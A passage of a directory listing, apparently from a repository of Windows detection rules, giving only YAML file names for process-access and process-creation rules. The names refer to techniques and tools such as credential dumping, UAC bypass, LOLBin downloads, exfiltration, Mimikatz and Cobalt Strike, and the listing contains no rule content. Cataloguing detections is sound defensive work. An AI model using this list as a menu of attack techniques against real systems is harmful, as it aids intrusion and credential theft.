│ │ ├── proc_access_win_susp_direct_ntopenprocess_call.yml
│ │ ├── proc_access_win_svchost_credential_dumping.yml
│ │ ├── proc_access_win_svchost_susp_access_request.yml
│ │ ├── proc_access_win_uac_bypass_editionupgrademanagerobj.yml
│ │ ├── proc_access_win_uac_bypass_wow64_logger.yml
│ │ └── proc_access_win_werfaultsecure_msmpeng_access.yml
│ ├── process_creation/
│ │ ├── proc_creation_win_7zip_exfil_dmp_files.yml
│ │ ├── proc_creation_win_7zip_password_compression.yml
│ │ ├── proc_creation_win_acccheckconsole_execution.yml
│ │ ├── proc_creation_win_addinutil_suspicious_cmdline.yml
│ │ ├── proc_creation_win_addinutil_uncommon_child_process.yml
│ │ ├── proc_creation_win_addinutil_uncommon_cmdline.yml
│ │ ├── proc_creation_win_addinutil_uncommon_dir_exec.yml
│ │ ├── proc_creation_win_adplus_memory_dump.yml
│ │ ├── proc_creation_win_agentexecutor_potential_abuse.yml
│ │ ├── proc_creation_win_agentexecutor_susp_usage.yml
│ │ ├── proc_creation_win_amsi_registry_tampering.yml
│ │ ├── proc_creation_win_appvlp_uncommon_child_process.yml
│ │ ├── proc_creation_win_arcsoc_susp_child_process.yml
│ │ ├── proc_creation_win_aspnet_compiler_exectuion.yml
│ │ ├── proc_creation_win_aspnet_compiler_susp_child_process.yml
│ │ ├── proc_creation_win_aspnet_compiler_susp_paths.yml
│ │ ├── proc_creation_win_at_interactive_execution.yml
│ │ ├── proc_creation_win_atbroker_uncommon_ats_execution.yml
│ │ ├── proc_creation_win_attrib_hiding_files.yml
│ │ ├── proc_creation_win_attrib_system_susp_paths.yml
│ │ ├── proc_creation_win_auditpol_nt_resource_kit_usage.yml
│ │ ├── proc_creation_win_auditpol_susp_execution.yml
│ │ ├── proc_creation_win_autorun_registry_modified_via_wmic.yml
│ │ ├── proc_creation_win_baaupdate_susp_child_process.yml
│ │ ├── proc_creation_win_bash_command_execution.yml
│ │ ├── proc_creation_win_bash_file_execution.yml
│ │ ├── proc_creation_win_bcdedit_boot_conf_tamper.yml
│ │ ├── proc_creation_win_bcdedit_susp_execution.yml
│ │ ├── proc_creation_win_bcp_export_data.yml
│ │ ├── proc_creation_win_bginfo_suspicious_child_process.yml
│ │ ├── proc_creation_win_bginfo_uncommon_child_process.yml
│ │ ├── proc_creation_win_bitlockertogo_execution.yml
│ │ ├── proc_creation_win_bitsadmin_download.yml
│ │ ├── proc_creation_win_bitsadmin_download_direct_ip.yml
│ │ ├── proc_creation_win_bitsadmin_download_file_sharing_domains.yml
│ │ ├── proc_creation_win_bitsadmin_download_susp_extensions.yml
│ │ ├── proc_creation_win_bitsadmin_download_susp_targetfolder.yml
│ │ ├── proc_creation_win_bitsadmin_potential_persistence.yml
│ │ ├── proc_creation_win_browsers_chromium_headless_debugging.yml
│ │ ├── proc_creation_win_browsers_chromium_headless_exec.yml
│ │ ├── proc_creation_win_browsers_chromium_headless_file_download.yml
│ │ ├── proc_creation_win_browsers_chromium_load_extension.yml
│ │ ├── proc_creation_win_browsers_chromium_mockbin_abuse.yml
│ │ ├── proc_creation_win_browsers_chromium_susp_load_extension.yml
│ │ ├── proc_creation_win_browsers_inline_file_download.yml
│ │ ├── proc_creation_win_browsers_remote_debugging.yml
│ │ ├── proc_creation_win_browsers_tor_execution.yml
│ │ ├── proc_creation_win_calc_uncommon_exec.yml
│ │ ├── proc_creation_win_cdb_arbitrary_command_execution.yml
│ │ ├── proc_creation_win_certmgr_certificate_installation.yml
│ │ ├── proc_creation_win_certoc_download.yml
│ │ ├── proc_creation_win_certoc_download_direct_ip.yml
│ │ ├── proc_creation_win_certoc_load_dll.yml
│ │ ├── proc_creation_win_certoc_load_dll_susp_locations.yml
│ │ ├── proc_creation_win_certreq_download.yml
│ │ ├── proc_creation_win_certutil_certificate_installation.yml
│ │ ├── proc_creation_win_certutil_decode.yml
│ │ ├── proc_creation_win_certutil_download.yml
│ │ ├── proc_creation_win_certutil_download_direct_ip.yml
│ │ ├── proc_creation_win_certutil_download_file_sharing_domains.yml
│ │ ├── proc_creation_win_certutil_encode.yml
│ │ ├── proc_creation_win_certutil_encode_susp_extensions.yml
│ │ ├── proc_creation_win_certutil_encode_susp_location.yml
│ │ ├── proc_creation_win_certutil_export_pfx.yml
│ │ ├── proc_creation_win_certutil_ntlm_coercion.yml
│ │ ├── proc_creation_win_chcp_codepage_lookup.yml
│ │ ├── proc_creation_win_chcp_codepage_switch.yml
│ │ ├── proc_creation_win_cipher_overwrite_deleted_data.yml
│ │ ├── proc_creation_win_citrix_trolleyexpress_procdump.yml
│ │ ├── proc_creation_win_clip_execution.yml
│ │ ├── proc_creation_win_cloudflared_portable_execution.yml
│ │ ├── proc_creation_win_cloudflared_quicktunnel_execution.yml
│ │ ├── proc_creation_win_cloudflared_tunnel_cleanup.yml
│ │ ├── proc_creation_win_cloudflared_tunnel_run.yml
│ │ ├── proc_creation_win_cmd_assoc_execution.yml
│ │ ├── proc_creation_win_cmd_assoc_tamper_exe_file_association.yml
│ │ ├── proc_creation_win_cmd_copy_dmp_from_share.yml
│ │ ├── proc_creation_win_cmd_curl_download_exec_combo.yml
│ │ ├── proc_creation_win_cmd_del_execution.yml
│ │ ├── proc_creation_win_cmd_del_greedy_deletion.yml
│ │ ├── proc_creation_win_cmd_dir_execution.yml
│ │ ├── proc_creation_win_cmd_dosfuscation.yml
│ │ ├── proc_creation_win_cmd_http_appdata.yml
│ │ ├── proc_creation_win_cmd_launched_with_hidden_start_flag.yml
│ │ ├── proc_creation_win_cmd_mklink_osk_cmd.yml
│ │ ├── proc_creation_win_cmd_mklink_shadow_copies_access_symlink.yml
│ │ ├── proc_creation_win_cmd_net_use_and_exec_combo.yml
│ │ ├── proc_creation_win_cmd_no_space_execution.yml
│ │ ├── proc_creation_win_cmd_ntdllpipe_redirect.yml
│ │ ├── proc_creation_win_cmd_path_traversal.yml
│ │ ├── proc_creation_win_cmd_ping_copy_combined_execution.yml
│ │ ├── proc_creation_win_cmd_ping_del_combined_execution.yml
│ │ ├── proc_creation_win_cmd_redirection_susp_folder.yml
│ │ ├── proc_creation_win_cmd_rmdir_execution.yml
│ │ ├── proc_creation_win_cmd_shadowcopy_access.yml
│ │ ├── proc_creation_win_cmd_stdin_redirect.yml
│ │ ├── proc_creation_win_cmd_sticky_key_like_backdoor_execution.yml
│ │ ├── proc_creation_win_cmd_sticky_keys_replace.yml
│ │ ├── proc_creation_win_cmd_type_arbitrary_file_download.yml
│ │ ├── proc_creation_win_cmd_unusual_parent.yml
│ │ ├── proc_creation_win_cmdkey_adding_generic_creds.yml
│ │ ├── proc_creation_win_cmdkey_recon.yml
│ │ ├── proc_creation_win_cmdl32_arbitrary_file_download.yml
│ │ ├── proc_creation_win_cmstp_execution_by_creation.yml
│ │ ├── proc_creation_win_comodo_ssh_shellhost_cmd_spawn.yml
│ │ ├── proc_creation_win_configsecuritypolicy_download_file.yml
│ │ ├── proc_creation_win_conhost_headless_powershell.yml
│ │ ├── proc_creation_win_conhost_legacy_option.yml
│ │ ├── proc_creation_win_conhost_path_traversal.yml
│ │ ├── proc_creation_win_conhost_susp_child_process.yml
│ │ ├── proc_creation_win_conhost_susp_winshell_child_process.yml
│ │ ├── proc_creation_win_conhost_uncommon_parent.yml
│ │ ├── proc_creation_win_control_panel_item.yml
│ │ ├── proc_creation_win_createdump_lolbin_execution.yml
│ │ ├── proc_creation_win_credential_guard_registry_tampering.yml
│ │ ├── proc_creation_win_csc_susp_dynamic_compilation.yml
│ │ ├── proc_creation_win_csc_susp_parent.yml
│ │ ├── proc_creation_win_csi_execution.yml
│ │ ├── proc_creation_win_csi_use_of_csharp_console.yml
│ │ ├── proc_creation_win_csvde_export.yml
│ │ ├── proc_creation_win_curl_cookie_hijacking.yml
│ │ ├── proc_creation_win_curl_custom_user_agent.yml
│ │ ├── proc_creation_win_curl_download_direct_ip_exec.yml
│ │ ├── proc_creation_win_curl_download_direct_ip_susp_extensions.yml
│ │ ├── proc_creation_win_curl_download_susp_file_sharing_domains.yml
│ │ ├── proc_creation_win_curl_insecure_connection.yml
│ │ ├── proc_creation_win_curl_insecure_proxy_or_doh.yml
│ │ ├── proc_creation_win_curl_local_file_read.yml
│ │ ├── proc_creation_win_curl_susp_download.yml
│ │ ├── proc_creation_win_customshellhost_susp_exec.yml
│ │ ├── proc_creation_win_dctask64_arbitrary_command_and_dll_execution.yml
│ │ ├── proc_creation_win_defaultpack_uncommon_child_process.yml
│ │ ├── proc_creation_win_defender_default_action_modified.yml
│ │ ├── proc_creation_win_defender_remove_context_menu.yml
│ │ ├── proc_creation_win_desktopimgdownldr_remote_file_download.yml
│ │ ├── proc_creation_win_desktopimgdownldr_susp_execution.yml
│ │ ├── proc_creation_win_devcon_disable_vmci_driver.yml
│ │ ├── proc_creation_win_device_credential_deployment.yml
│ │ ├── proc_creation_win_deviceenroller_dll_sideloading.yml
│ │ ├── proc_creation_win_devinit_lolbin_usage.yml
│ │ ├── proc_creation_win_dfsvc_suspicious_child_processes.yml
│ │ ├── proc_creation_win_dirlister_execution.yml
│ │ ├── proc_creation_win_discovery_via_reg_queries.yml
│ │ ├── proc_creation_win_diskshadow_child_process_susp.yml
│ │ ├── proc_creation_win_diskshadow_script_mode_susp_ext.yml
│ │ ├── proc_creation_win_diskshadow_script_mode_susp_location.yml
│ │ ├── proc_creation_win_dism_enable_powershell_web_access_feature.yml
│ │ ├── proc_creation_win_dism_remove.yml
│ │ ├── proc_creation_win_dll_sideload_vmware_xfer.yml
│ │ ├── proc_creation_win_dllhost_no_cli_execution.yml
│ │ ├── proc_creation_win_dns_exfiltration_tools_execution.yml
│ │ ├── proc_creation_win_dns_susp_child_process.yml
│ │ ├── proc_creation_win_dnscmd_discovery.yml
│ │ ├── proc_creation_win_dnscmd_install_new_server_level_plugin_dll.yml
│ │ ├── proc_creation_win_dnx_execute_csharp_code.yml
│ │ ├── proc_creation_win_dotnet_arbitrary_dll_csproj_execution.yml
│ │ ├── proc_creation_win_dotnet_trace_lolbin_execution.yml
│ │ ├── proc_creation_win_dotnetdump_memory_dump.yml
│ │ ├── proc_creation_win_driverquery_recon.yml
│ │ ├── proc_creation_win_driverquery_usage.yml
│ │ ├── proc_creation_win_dsacls_abuse_permissions.yml
│ │ ├── proc_creation_win_dsacls_password_spray.yml
│ │ ├── proc_creation_win_dsquery_domain_trust_discovery.yml
│ │ ├── proc_creation_win_dtrace_kernel_dump.yml
│ │ ├── proc_creation_win_dump64_defender_av_bypass_rename.yml
│ │ ├── proc_creation_win_dumpminitool_execution.yml
│ │ ├── proc_creation_win_dumpminitool_susp_execution.yml
│ │ ├── proc_creation_win_dxcap_arbitrary_binary_execution.yml
│ │ ├── proc_creation_win_esentutl_params.yml
│ │ ├── proc_creation_win_esentutl_sensitive_file_copy.yml
│ │ ├── proc_creation_win_esentutl_webcache.yml
│ │ ├── proc_creation_win_event_logging_disable_via_key_minint.yml
│ │ ├── proc_creation_win_eventvwr_susp_child_process.yml
│ │ ├── proc_creation_win_expand_cabinet_files.yml
│ │ ├── proc_creation_win_explorer_break_process_tree.yml
│ │ ├── proc_creation_win_explorer_folder_shortcut_via_shell_binary.yml
│ │ ├── proc_creation_win_explorer_nouaccheck.yml
│ │ ├── proc_creation_win_findstr_download.yml
│ │ ├── proc_creation_win_findstr_gpp_passwords.yml
│ │ ├── proc_creation_win_findstr_lnk.yml
│ │ ├── proc_creation_win_findstr_lsass.yml
│ │ ├── proc_creation_win_findstr_recon_everyone.yml
│ │ ├── proc_creation_win_findstr_recon_pipe_output.yml
│ │ ├── proc_creation_win_findstr_security_keyword_lookup.yml
│ │ ├── proc_creation_win_findstr_subfolder_search.yml
│ │ ├── proc_creation_win_findstr_sysmon_discovery_via_default_altitude.yml
│ │ ├── proc_creation_win_finger_execution.yml
│ │ ├── proc_creation_win_fltmc_unload_driver.yml
│ │ ├── proc_creation_win_fltmc_unload_driver_sysmon.yml
│ │ ├── proc_creation_win_forfiles_child_process_masquerading.yml
│ │ ├── proc_creation_win_forfiles_proxy_execution_.yml
│ │ ├── proc_creation_win_format_uncommon_filesystem_load.yml
│ │ ├── proc_creation_win_fsi_fsharp_code_execution.yml
│ │ ├── proc_creation_win_fsutil_drive_enumeration.yml
│ │ ├── proc_creation_win_fsutil_symlinkevaluation.yml
│ │ ├── proc_creation_win_fsutil_usage.yml
│ │ ├── proc_creation_win_ftp_arbitrary_command_execution.yml
│ │ ├── proc_creation_win_gfxdownloadwrapper_arbitrary_file_download.yml
│ │ ├── proc_creation_win_git_susp_clone.yml
│ │ ├── proc_creation_win_github_self_hosted_runner.yml
│ │ ├── proc_creation_win_googleupdate_susp_child_process.yml
│ │ ├── proc_creation_win_gpg4win_decryption.yml
│ │ ├── proc_creation_win_gpg4win_encryption.yml
│ │ ├── proc_creation_win_gpg4win_portable_execution.yml
│ │ ├── proc_creation_win_gpg4win_susp_location.yml
│ │ ├── proc_creation_win_gpresult_execution.yml
│ │ ├── proc_creation_win_gup_arbitrary_binary_execution.yml
│ │ ├── proc_creation_win_gup_download.yml
│ │ ├── proc_creation_win_gup_susp_child_process.yml
│ │ ├── proc_creation_win_gup_suspicious_execution.yml
│ │ ├── proc_creation_win_hh_chm_execution.yml
│ │ ├── proc_creation_win_hh_chm_remote_download_or_execution.yml
│ │ ├── proc_creation_win_hh_html_help_susp_child_process.yml
│ │ ├── proc_creation_win_hh_susp_execution.yml
│ │ ├── proc_creation_win_hktl_adcspwn.yml
│ │ ├── proc_creation_win_hktl_bloodhound_sharphound.yml
│ │ ├── proc_creation_win_hktl_c3_rundll32_pattern.yml
│ │ ├── proc_creation_win_hktl_certify.yml
│ │ ├── proc_creation_win_hktl_certipy.yml
│ │ ├── proc_creation_win_hktl_cobaltstrike_bloopers_cmd.yml
│ │ ├── proc_creation_win_hktl_cobaltstrike_bloopers_modules.yml
│ │ ├── proc_creation_win_hktl_cobaltstrike_load_by_rundll32.yml
│ │ ├── proc_creation_win_hktl_cobaltstrike_process_patterns.yml
│ │ ├── proc_creation_win_hktl_coercedpotato.yml
│ │ ├── proc_creation_win_hktl_covenant.yml
│ │ ├── proc_creation_win_hktl_crackmapexec_execution.yml
│ │ ├── proc_creation_win_hktl_crackmapexec_execution_patterns.yml
│ │ ├── proc_creation_win_hktl_crackmapexec_patterns.yml
│ │ ├── proc_creation_win_hktl_crackmapexec_powershell_obfuscation.yml
│ │ ├── proc_creation_win_hktl_createminidump.yml
│ │ ├── proc_creation_win_hktl_dinjector.yml
│ │ ├── proc_creation_win_hktl_doppelganger.yml
│ │ ├── proc_creation_win_hktl_dumpert.yml
│ │ ├── proc_creation_win_hktl_edr_freeze.yml
│ │ ├── proc_creation_win_hktl_edrsilencer.yml
│ │ ├── proc_creation_win_hktl_empire_powershell_launch.yml
│ │ ├── proc_creation_win_hktl_empire_powershell_uac_bypass.yml
│ │ ├── proc_creation_win_hktl_evil_winrm.yml
│ │ ├── proc_creation_win_hktl_execution_via_imphashes.yml
│ │ ├── proc_creation_win_hktl_execution_via_pe_metadata.yml
│ │ ├── proc_creation_win_hktl_gmer.yml
│ │ ├── proc_creation_win_hktl_handlekatz.yml
│ │ ├── proc_creation_win_hktl_hashcat.yml
│ │ ├── proc_creation_win_hktl_hollowreaper.yml
│ │ ├── proc_creation_win_hktl_htran_or_natbypass.yml
│ │ ├── proc_creation_win_hktl_hydra.yml
│ │ ├── proc_creation_win_hktl_impacket_lateral_movement.yml
│ │ ├── proc_creation_win_hktl_impacket_tools.yml
│ │ ├── proc_creation_win_hktl_impersonate.yml
│ │ ├── proc_creation_win_hktl_inveigh.yml
│ │ ├── proc_creation_win_hktl_invoke_obfuscation_clip.yml
│ │ ├── proc_creation_win_hktl_invoke_obfuscation_obfuscated_iex_commandline.yml
│ │ ├── proc_creation_win_hktl_invoke_obfuscation_stdin.yml
│ │ ├── proc_creation_win_hktl_invoke_obfuscation_var.yml
│ │ ├── proc_creation_win_hktl_invoke_obfuscation_via_compress.yml
│ │ ├── proc_creation_win_hktl_invoke_obfuscation_via_stdin.yml
│ │ ├── proc_creation_win_hktl_invoke_obfuscation_via_use_clip.yml
│ │ ├── proc_creation_win_hktl_invoke_obfuscation_via_use_mhsta.yml
│ │ ├── proc_creation_win_hktl_invoke_obfuscation_via_var.yml
│ │ ├── proc_creation_win_hktl_jlaive_batch_execution.yml
│ │ ├── proc_creation_win_hktl_koadic.yml
│ │ ├── proc_creation_win_hktl_krbrelay.yml
│ │ ├── proc_creation_win_hktl_krbrelay_remote.yml
│ │ ├── proc_creation_win_hktl_krbrelayup.yml
│ │ ├── proc_creation_win_hktl_lazagne.yml
│ │ ├── proc_creation_win_hktl_localpotato.yml
│ │ ├── proc_creation_win_hktl_meterpreter_getsystem.yml
│ │ ├── proc_creation_win_hktl_mimikatz_command_line.yml
│ │ ├── proc_creation_win_hktl_pchunter.yml
│ │ ├── proc_creation_win_hktl_powersploit_empire_default_schtasks.yml
│ │ ├── proc_creation_win_hktl_powertool.yml
│ │ ├── proc_creation_win_hktl_purplesharp_indicators.yml
│ │ ├── proc_creation_win_hktl_pypykatz.yml
│ │ ├── proc_creation_win_hktl_quarks_pwdump.yml
│ │ ├── proc_creation_win_hktl_redmimicry_winnti_playbook.yml
│ │ ├── proc_creation_win_hktl_relay_attacks_tools.yml
│ │ ├── proc_creation_win_hktl_rubeus.yml
│ │ ├── proc_creation_win_hktl_safetykatz.yml
│ │ ├── proc_creation_win_hktl_secutyxploded.yml
│ │ ├── proc_creation_win_hktl_selectmyparent.yml
│ │ ├── proc_creation_win_hktl_sharp_chisel.yml
│ │ ├── proc_creation_win_hktl_sharp_dpapi_execution.yml
│ │ ├── proc_creation_win_hktl_sharp_impersonation.yml
│ │ ├── proc_creation_win_hktl_sharp_ldap_monitor.yml
│ │ ├── proc_creation_win_hktl_sharpersist.yml
│ │ ├── proc_creation_win_hktl_sharpevtmute.yml
│ │ ├── proc_creation_win_hktl_sharpldapwhoami.yml
│ │ ├── proc_creation_win_hktl_sharpmove.yml
│ │ ├── proc_creation_win_hktl_sharpsuccessor_execution.yml
│ │ ├── proc_creation_win_hktl_sharpup.yml
│ │ ├── proc_creation_win_hktl_sharpview.yml
│ │ ├── proc_creation_win_hktl_sharpwsus_wsuspendu_execution.yml
│ │ ├── proc_creation_win_hktl_silenttrinity_stager.yml
│ │ ├── proc_creation_win_hktl_sliver_c2_execution_pattern.yml
│ │ ├── proc_creation_win_hktl_soaphound_execution.yml
│ │ ├── proc_creation_win_hktl_stracciatella_execution.yml
│ │ ├── proc_creation_win_hktl_sysmoneop.yml
│ │ ├── proc_creation_win_hktl_trufflesnout.yml
│ │ ├── proc_creation_win_hktl_uacme.yml
│ │ ├── proc_creation_win_hktl_wce.yml
│ │ ├── proc_creation_win_hktl_winpeas.yml
│ │ ├── proc_creation_win_hktl_winpwn.yml
│ │ ├── proc_creation_win_hktl_wmiexec_default_powershell.yml
│ │ ├── proc_creation_win_hktl_wsass.yml
│ │ ├── proc_creation_win_hktl_xordump.yml
│ │ ├── proc_creation_win_hktl_zipexec.yml
│ │ ├── proc_creation_win_hostname_execution.yml
│ │ ├── proc_creation_win_hvci_registry_tampering.yml
│ │ ├── proc_creation_win_hwp_exploits.yml
│ │ ├── proc_creation_win_hxtsr_masquerading.yml
│ │ ├── proc_creation_win_icacls_deny.yml
│ │ ├── proc_creation_win_ieexec_download.yml
│ │ ├── proc_creation_win_iexpress_susp_execution.yml
│ │ ├── proc_creation_win_iis_appcmd_http_logging.yml
│ │ ├── proc_creation_win_iis_appcmd_service_account_password_dumped.yml
│ │ ├── proc_creation_win_iis_appcmd_susp_module_install.yml
│ │ ├── proc_creation_win_iis_appcmd_susp_rewrite_rule.yml
│ │ ├── proc_creation_win_iis_connection_strings_decryption.yml
│ │ ├── proc_creation_win_iis_logs_deletion.yml
│ │ ├── proc_creation_win_iis_susp_module_registration.yml
│ │ ├── proc_creation_win_ilasm_il_code_compilation.yml
│ │ ├── proc_creation_win_imagingdevices_unusual_parents.yml
│ │ ├── proc_creation_win_imewbdld_download.yml
│ │ ├── proc_creation_win_infdefaultinstall_execute_sct_scripts.yml
│ │ ├── proc_creation_win_installutil_download.yml
│ │ ├── proc_creation_win_instalutil_no_log_execution.yml
│ │ ├── proc_creation_win_java_keytool_susp_child_process.yml
│ │ ├── proc_creation_win_java_manageengine_susp_child_process.yml
│ │ ├── proc_creation_win_java_remote_debugging.yml
│ │ ├── proc_creation_win_java_susp_child_process.yml
│ │ ├── proc_creation_win_java_susp_child_process_2.yml
│ │ ├── proc_creation_win_java_sysaidserver_susp_child_process.yml
│ │ ├── proc_creation_win_jsc_execution.yml
│ │ ├── proc_creation_win_kavremover_uncommon_execution.yml
│ │ ├── proc_creation_win_kd_execution.yml
│ │ ├── proc_creation_win_kerberos_coercion_via_dns_spn_spoofing.yml
│ │ ├── proc_creation_win_keyscrambler_susp_child_process.yml
│ │ ├── proc_creation_win_ksetup_password_change_computer.yml
│ │ ├── proc_creation_win_ksetup_password_change_user.yml
│ │ ├── proc_creation_win_ldifde_export.yml
│ │ ├── proc_creation_win_ldifde_file_load.yml
│ │ ├── proc_creation_win_link_uncommon_parent_process.yml
│ │ ├── proc_creation_win_lodctr_performance_counter_tampering.yml
│ │ ├── proc_creation_win_logman_disable_eventlog.yml
│ │ ├── proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml
│ │ ├── proc_creation_win_lolbin_devtoolslauncher.yml
│ │ ├── proc_creation_win_lolbin_diantz_ads.yml
│ │ ├── proc_creation_win_lolbin_diantz_remote_cab.yml
│ │ ├── proc_creation_win_lolbin_extrac32.yml
│ │ ├── proc_creation_win_lolbin_extrac32_ads.yml
│ │ ├── proc_creation_win_lolbin_gather_network_info.yml
│ │ ├── proc_creation_win_lolbin_gpscript.yml
│ │ ├── proc_creation_win_lolbin_ie4uinit.yml
│ │ ├── proc_creation_win_lolbin_launch_vsdevshell.yml
│ │ ├── proc_creation_win_lolbin_manage_bde.yml
│ │ ├── proc_creation_win_lolbin_mavinject_process_injection.yml
│ │ ├── proc_creation_win_lolbin_mpiexec.yml
│ │ ├── proc_creation_win_lolbin_msdeploy.yml
│ │ ├── proc_creation_win_lolbin_openconsole.yml
│ │ ├── proc_creation_win_lolbin_openwith.yml
│ │ ├── proc_creation_win_lolbin_pcalua.yml
│ │ ├── proc_creation_win_lolbin_pcwrun.yml
│ │ ├── proc_creation_win_lolbin_pcwrun_follina.yml
│ │ ├── proc_creation_win_lolbin_pcwutl.yml
│ │ ├── proc_creation_win_lolbin_pester.yml
│ │ ├── proc_creation_win_lolbin_pester_1.yml
│ │ ├── proc_creation_win_lolbin_printbrm.yml
│ │ ├── proc_creation_win_lolbin_pubprn.yml
│ │ ├── proc_creation_win_lolbin_rasautou_dll_execution.yml
│ │ ├── proc_creation_win_lolbin_register_app.yml
│ │ ├── proc_creation_win_lolbin_remote.yml
│ │ ├── proc_creation_win_lolbin_replace.yml
│ │ ├── proc_creation_win_lolbin_runexehelper.yml
│ │ ├── proc_creation_win_lolbin_runscripthelper.yml
│ │ ├── proc_creation_win_lolbin_scriptrunner.yml
│ │ ├── proc_creation_win_lolbin_settingsynchost.yml
│ │ ├── proc_creation_win_lolbin_sftp.yml
│ │ ├── proc_creation_win_lolbin_susp_driver_installed_by_pnputil.yml
│ │ ├── proc_creation_win_lolbin_susp_grpconv.yml
│ │ ├── proc_creation_win_lolbin_susp_sqldumper_activity.yml
│ │ ├── proc_creation_win_lolbin_syncappvpublishingserver_execute_psh.yml
│ │ ├── proc_creation_win_lolbin_syncappvpublishingserver_vbs_execute_psh.yml
│ │ ├── proc_creation_win_lolbin_tracker.yml
│ │ ├── proc_creation_win_lolbin_ttdinject.yml
│ │ ├── proc_creation_win_lolbin_tttracer_mod_load.yml
│ │ ├── proc_creation_win_lolbin_unregmp2.yml
│ │ ├── proc_creation_win_lolbin_utilityfunctions.yml
│ │ ├── proc_creation_win_lolbin_visual_basic_compiler.yml
│ │ ├── proc_creation_win_lolbin_visualuiaverifynative.yml
│ │ ├── proc_creation_win_lolbin_vsiisexelauncher.yml
│ │ ├── proc_creation_win_lolbin_wfc.yml
│ │ ├── proc_creation_win_lolscript_register_app.yml
│ │ ├── proc_creation_win_lsass_process_clone.yml
│ │ ├── proc_creation_win_mftrace_child_process.yml
│ │ ├── proc_creation_win_mmc_default_domain_gpo_modification_via_gpme.yml
│ │ ├── proc_creation_win_mmc_mmc20_lateral_movement.yml
│ │ ├── proc_creation_win_mmc_rlo_abuse_pattern.yml
│ │ ├── proc_creation_win_mmc_susp_child_process.yml
│ │ ├── proc_creation_win_mode_codepage_russian.yml
│ │ ├── proc_creation_win_mofcomp_execution.yml
│ │ ├── proc_creation_win_mpcmdrun_dll_sideload_defender.yml
│ │ ├── proc_creation_win_mpcmdrun_download_arbitrary_file.yml
│ │ ├── proc_creation_win_mpcmdrun_remove_windows_defender_definition.yml
│ │ ├── proc_creation_win_msbuild_susp_parent_process.yml
│ │ ├── proc_creation_win_msdt_answer_file_exec.yml
│ │ ├── proc_creation_win_msdt_arbitrary_command_execution.yml
│ │ ├── proc_creation_win_msdt_susp_cab_options.yml
│ │ ├── proc_creation_win_msdt_susp_parent.yml
│ │ ├── proc_creation_win_msedge_proxy_download.yml
│ │ ├── proc_creation_win_mshta_http.yml
│ │ ├── proc_creation_win_mshta_inline_vbscript.yml
│ │ ├── proc_creation_win_mshta_javascript.yml
│ │ ├── proc_creation_win_mshta_lethalhta_technique.yml
│ │ ├── proc_creation_win_mshta_susp_child_processes.yml
│ │ ├── proc_creation_win_mshta_susp_execution.yml
│ │ ├── proc_creation_win_mshta_susp_pattern.yml
│ │ ├── proc_creation_win_msiexec_dll.yml
│ │ ├── proc_creation_win_msiexec_embedding.yml
│ │ ├── proc_creation_win_msiexec_execute_dll.yml
│ │ ├── proc_creation_win_msiexec_install_quiet.yml
│ │ ├── proc_creation_win_msiexec_install_remote.yml
│ │ ├── proc_creation_win_msiexec_masquerading.yml
│ │ ├── proc_creation_win_msiexec_web_install.yml
│ │ ├── proc_creation_win_msix_ai_stub_execution.yml
│ │ ├── proc_creation_win_msohtmed_download.yml
│ │ ├── proc_creation_win_mspub_download.yml
│ │ ├── proc_creation_win_msra_process_injection.yml
│ │ ├── proc_creation_win_mssql_sqlps_susp_execution.yml
│ │ ├── proc_creation_win_mssql_sqltoolsps_susp_execution.yml
│ │ ├── proc_creation_win_mssql_susp_child_process.yml
│ │ ├── proc_creation_win_mssql_veaam_susp_child_processes.yml
│ │ ├── proc_creation_win_mstsc_rdp_hijack_shadowing.yml
│ │ ├── proc_creation_win_mstsc_remote_connection.yml
│ │ ├── proc_creation_win_mstsc_run_local_rdp_file.yml
│ │ ├── proc_creation_win_mstsc_run_local_rdp_file_susp_location.yml
│ │ ├── proc_creation_win_mstsc_run_local_rpd_file_susp_parent.yml
│ │ ├── proc_creation_win_msxsl_execution.yml
│ │ ├── proc_creation_win_msxsl_remote_execution.yml
│ │ ├── proc_creation_win_net_groups_and_accounts_recon.yml
│ │ ├── proc_creation_win_net_share_unmount.yml
│ │ ├── proc_creation_win_net_start_service.yml
│ │ ├── proc_creation_win_net_stop_service.yml
│ │ ├── proc_creation_win_net_use_mount_admin_share.yml
│ │ ├── proc_creation_win_net_use_mount_internet_share.yml
│ │ ├── proc_creation_win_net_use_mount_share.yml
│ │ ├── proc_creation_win_net_use_network_connections_discovery.yml
│ │ ├── proc_creation_win_net_use_password_plaintext.yml
│ │ ├── proc_creation_win_net_user_add.yml
│ │ ├── proc_creation_win_net_user_add_never_expire.yml
│ │ ├── proc_creation_win_net_user_default_accounts_manipulation.yml
│ │ ├── proc_creation_win_net_view_share_and_sessions_enum.yml
│ │ ├── proc_creation_win_netsh_fw_add_rule.yml
│ │ ├── proc_creation_win_netsh_fw_allow_program_in_susp_location.yml
│ │ ├── proc_creation_win_netsh_fw_allow_rdp.yml
│ │ ├── proc_creation_win_netsh_fw_delete_rule.yml
│ │ ├── proc_creation_win_netsh_fw_disable.yml
│ │ ├── proc_creation_win_netsh_fw_enable_group_rule.yml
│ │ ├── proc_creation_win_netsh_fw_rules_discovery.yml
│ │ ├── proc_creation_win_netsh_fw_set_rule.yml
│ │ ├── proc_creation_win_netsh_helper_dll_persistence.yml
│ │ ├── proc_creation_win_netsh_packet_capture.yml
│ │ ├── proc_creation_win_netsh_port_forwarding.yml
│ │ ├── proc_creation_win_netsh_port_forwarding_3389.yml
│ │ ├── proc_creation_win_netsh_wifi_credential_harvesting.yml
│ │ ├── proc_creation_win_nltest_execution.yml
│ │ ├── proc_creation_win_nltest_recon.yml
│ │ ├── proc_creation_win_node_abuse.yml
│ │ ├── proc_creation_win_node_adobe_creative_cloud_abuse.yml
│ │ ├── proc_creation_win_notepad_local_passwd_discovery.yml
│ │ ├── proc_creation_win_nslookup_domain_discovery.yml
│ │ ├── proc_creation_win_nslookup_poweshell_download.yml
│ │ ├── proc_creation_win_ntdsutil_susp_usage.yml
│ │ ├── proc_creation_win_ntdsutil_usage.yml
│ │ ├── proc_creation_win_odbcconf_driver_install.yml
│ │ ├── proc_creation_win_odbcconf_driver_install_susp.yml
│ │ ├── proc_creation_win_odbcconf_exec_susp_locations.yml
│ │ ├── proc_creation_win_odbcconf_register_dll_regsvr.yml
│ │ ├── proc_creation_win_odbcconf_register_dll_regsvr_susp.yml
│ │ ├── proc_creation_win_odbcconf_response_file.yml
│ │ ├── proc_creation_win_odbcconf_response_file_susp.yml
│ │ ├── proc_creation_win_odbcconf_uncommon_child_process.yml
│ │ ├── proc_creation_win_office_arbitrary_cli_download.yml
│ │ ├── proc_creation_win_office_excel_dcom_lateral_movement.yml
